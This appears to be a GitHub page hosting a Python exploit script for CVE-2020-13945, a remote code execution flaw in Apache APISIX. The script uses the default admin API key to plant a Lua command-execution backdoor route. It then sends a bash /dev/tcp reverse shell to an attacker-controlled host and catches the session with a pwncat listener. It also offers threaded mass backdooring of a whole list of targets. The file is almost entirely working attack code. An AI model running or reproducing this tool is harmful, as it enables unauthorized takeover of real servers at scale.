-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCVE-2020-13945.py
133 lines (115 loc) · 6.15 KB
/
CVE-2020-13945.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
#!/usr/bin/env python3
import socket
import requests
import argparse
import threading
import pwncat.manager
from rich.console import Console
from alive_progress import alive_bar
from concurrent.futures import ThreadPoolExecutor, as_completed
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
api_path = "/apisix/admin/routes"
test_backdoor = "/check?cmd=echo%20DHSOwjdaKWDJKkjwdJDW"
revshell_backdoor = "/check?cmd="
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
"X-API-KEY": "edd1c9f034335f136f87ad84b625c8f1",
"Content-Type": "application/json"
}
backdoor_payload = {
"uri": "/check",
"script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close() \n end \nreturn _M",
"upstream": {
"type": "roundrobin",
"nodes": {
"www.example.com:80": 1
}
}
}
console = Console()
def plant_backdoor(target):
try:
requests.post(f"{target}{api_path}", headers=headers, json=backdoor_payload, timeout=50, verify=False)
exec_response = requests.get(target + test_backdoor, headers=headers, timeout=50, verify=False)
if "DHSOwjdaKWDJKkjwdJDW" in exec_response.text:
return True
except requests.RequestException:
return False
def exploit_target(target, lhost, lport):
revshell_payload = f"bash%20-c%20%270%3C%2653-%3Bexec%2053%3C%3E%2Fdev%2Ftcp%2F{lhost}%2F{lport}%3Bsh%20%3C%2653%20%3E%2653%202%3E%2653%27"
console.print(f"[blue][*][/blue] Planting backdoor [bold bright_yellow]{revshell_backdoor}[/bold bright_yellow] to verify vulnerability")
if plant_backdoor(target):
console.print(f"[blue][*][/blue] Backdoor planted and verified execution on [bold bright_cyan]{target}[/bold bright_cyan]")
console.print(f"[green][+][/green] The target appears to be vulnerable")
console.print(f"[blue][*][/blue] Triggering shell please wait")
requests.get(target + revshell_backdoor + revshell_payload).text
else:
console.print(f"[red][-][/red] Failed to plant backdoor on {target}")
exit()
def start_listener(bindaddress, bindport, timeout=100):
bind_ip = socket.gethostbyname(bindaddress)
with socket.create_server((bind_ip, int(bindport))) as listener:
listener.settimeout(timeout)
console.print(f"[blue][*][/blue] Listening on {bindaddress}:{bindport} for incoming connections")
try:
victim, victim_addr = listener.accept()
console.print(f"[green][+][/green] Received connection from {victim_addr[0]}:{victim_addr[1]}")
console.print("[blue][*][/blue] Shell opened successfully")
with pwncat.manager.Manager() as manager:
session = manager.create_session(platform="linux", protocol="socket", client=victim)
manager.interactive()
except socket.timeout:
console.print(f"[red][-][/red] No reverse shell connection received within {timeout} seconds")
exit()
def mass_exploit(target):
if plant_backdoor(target):
console.print(f"[bold bright_green][+][/bold bright_green] Backdoor planted successfully on [bold bright_cyan]{target}{revshell_backdoor}[/bold bright_cyan] [bold bright_yellow](Insert Here LoL :)[/bold bright_yellow]")
def scanner(target_file, threads):
try:
with open(target_file, "r") as file:
targets = [line.strip() for line in file]
except FileNotFoundError:
console.print(f"[red][-][/red] Target file {target_file} not found.")
return
if not targets:
console.print(f"[red][-][/red] No targets to scan.")
return
with alive_bar(len(targets), title="Planting Backdoor", bar="smooth", enrich_print=False) as bar:
with ThreadPoolExecutor(max_workers=threads) as executor:
futures = [executor.submit(mass_exploit, target) for target in targets]
for future in as_completed(futures):
future.result()
bar()
def trigger_shell(target, lhost, lport, bindaddress, bindport):
exploit_thread = threading.Thread(target=exploit_target, args=(target, lhost, lport))
listener_thread = threading.Thread(target=start_listener, args=(bindaddress, bindport))
exploit_thread.start()
listener_thread.start()
exploit_thread.join()
listener_thread.join()
def ascii_art():
console.print("[bold bright_green]┏┓┓┏┏┓ ┏┓┏┓┏┓┏┓ ┓┏┓┏┓┏┓┏━[/bold bright_green]")
console.print("[bold bright_green]┃ ┃┃┣ ━━┏┛┃┫┏┛┃┫━━┃ ┫┗┫┃┃┗┓[/bold bright_green]")
console.print("[bold bright_green]┗┛┗┛┗┛ ┗━┗┛┗━┗┛ ┻┗┛┗┛┗╋┗┛[/bold bright_green]")
print("Coded By: K3ysTr0K3R")
print("")
def main():
ascii_art()
parser = argparse.ArgumentParser(description="A PoC exploit for CVE-2020-13945 - Apache APISIX Remote Code Execution (RCE)")
parser.add_argument("-u", "--url", help="Target URL to exploit.")
parser.add_argument("-f", "--file", help="File containing target URLs to scan from.")
parser.add_argument("-t", "--threads", type=int, help="The number of threads to use for the scanner.")
parser.add_argument("-lh", "--lhost", help="Local host for reverse shell.")
parser.add_argument("-lp", "--lport", help="Local port for reverse shell.")
parser.add_argument("-ba", "--bindaddress", help="Bind address for bind shell (Required).")
parser.add_argument("-bp", "--bindport", help="Bind port listener (Required).")
args = parser.parse_args()
if args.url and args.lhost and args.lport and args.bindaddress and args.bindport:
trigger_shell(args.url, args.lhost, args.lport, args.bindaddress, args.bindport)
elif args.file and args.threads:
scanner(args.file, args.threads)
else:
parser.print_help()
if __name__ == "__main__":
main()